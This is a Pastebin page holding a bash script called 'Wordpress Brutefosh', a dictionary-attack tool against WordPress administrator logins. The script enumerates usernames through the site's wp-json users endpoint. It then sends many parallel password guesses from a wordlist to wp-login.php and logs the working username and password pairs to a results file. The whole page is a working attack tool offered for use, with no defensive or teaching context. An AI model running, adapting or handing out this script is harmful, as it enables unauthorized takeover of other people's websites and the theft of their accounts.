zerobyte-id

[BASH] Wordpress Brutefosh 1.0

Mar 28th, 2019
1,547
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # Name       : Wordpress Brutefosh
  3. # Version    : 1.2
  4. # Desc.      : Dictionary Attack Tool - Wordpress Admin
  5. # Coded by   : Schopath
  6. # Website    : www.zerobyte.id
  7. # Updated on : 2019-03-28
  8.  
  9. #----------- CONFIGURATION -----------
  10. curl_timeout=20
  11. multithread_limit=10
  12. #--------- CONFIGURATION EOF ---------
  13.  
  14. if [[ -f wpusername.tmp ]]
  15. then
  16.     rm wpusername.tmp
  17. fi
  18. RED='\e[31m'
  19. GRN='\e[32m'
  20. YEL='\e[33m'
  21. CLR='\e[0m'
  22.  
  23. function _GetUserWPJSON() {
  24.     Target="${1}";
  25.     UsernameLists=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")');
  26.     echo ""
  27.     if [[ -z ${UsernameLists} ]];
  28.     then
  29.         echo -e "${YEL}INFO: Cannot detect Username!${CLR}"
  30.     else
  31.         echo -ne > wpusername.tmp
  32.         for Username in ${UsernameLists};
  33.         do
  34.             echo "INFO: Found username \"${Username}\"..."
  35.             echo "${Username}" >> wpusername.tmp
  36.         done
  37.     fi
  38. }
  39.  
  40. function _TestLogin() {
  41.     Target="${1}"
  42.     Username="${2}"
  43.     Password="${3}"
  44.     LetsTry=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s -w "\nHTTP_STATUS_CODE_X %{http_code}\n" "${Target}/wp-login.php" --data "log=${Username}&pwd=${Password}&wp-submit=Log+In" --compressed)
  45.     if [[ ! -z $(echo ${LetsTry} | grep login_error | grep div) ]];
  46.     then
  47.         echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
  48.     elif [[ $(echo ${LetsTry} | grep "HTTP_STATUS_CODE_X" | awk '{print $2}') == "302" ]];
  49.     then
  50.         echo -e "${GRN}[!] FOUND ${Target} \e[30;48;5;82m ${Username}:${Password} ${CLR}"
  51.         echo "${Target} [${Username}:${Password}]" >> wpbf-results.txt
  52.     else
  53.         echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
  54.     fi
  55. }
  56.  
  57. echo ' _    _               _                         '
  58. echo '| |  | | ___  _ __ __| |_ __  _ __ ___  ___ ___ '
  59. echo '| |/\| |/ _ \| `__/ _` | `_ \| `__/ _ \/ __/ __|'
  60. echo '\  /\  / (_) | | | (_| | |_) | | |  __/\__ \__ \'
  61. echo ' \/  \/ \___/|_|  \__,_| .__/|_|  \___||___/___/'
  62. echo '                       |_|.::Brutefo(sh) 2019::.'
  63. echo ''
  64.  
  65. echo -ne "[?] Input website target : "
  66. read Target
  67.  
  68. curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-login.php" > wplogin.tmp
  69. if [[ -z $(cat wplogin.tmp | grep "wp-submit") ]];
  70. then
  71.     echo -e "${RED}ERROR: Invalid wordpress wp-login!${CLR}"
  72.     exit
  73. fi
  74.  
  75. echo -ne "[?] Input password lists in (file) : "
  76. read PasswordLists
  77.  
  78. if [[ ! -f ${PasswordLists} ]]
  79. then
  80.     echo -e "${RED}ERROR: Wordlists not found!${CLR}"
  81.     exit
  82. fi
  83.  
  84. _GetUserWPJSON ${Target}
  85.  
  86. if [[ -f wpusername.tmp ]]
  87. then
  88.     for User in $(cat wpusername.tmp)
  89.     do
  90.         (
  91.             for Pass in $(cat ${PasswordLists})
  92.             do
  93.                 ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
  94.                 _TestLogin ${Target} ${User} ${Pass} &
  95.             done
  96.             wait
  97.         )
  98.     done
  99. else
  100.     echo -e "${YEL}INFO: Cannot find username${CLR}"
  101.     echo -ne "[?] Input username manually : "
  102.     read User
  103.  
  104.     if [[ -z ${PasswordLists} ]]
  105.     then
  106.         echo -e "${RED}ERROR: Username cannot be empty!${CLR}"
  107.         exit
  108.     fi
  109.     echo ''
  110.     (
  111.         for Pass in $(cat ${PasswordLists})
  112.         do
  113.             ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
  114.             _TestLogin ${Target} ${User} ${Pass} &
  115.         done
  116.         wait
  117.     )
  118. fi
  119. echo "INFO: Found $(cat wpbf-results.txt | grep ${Target} | sort -nr | uniq | wc -l) username & password in ./wpbf-results.txt"
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×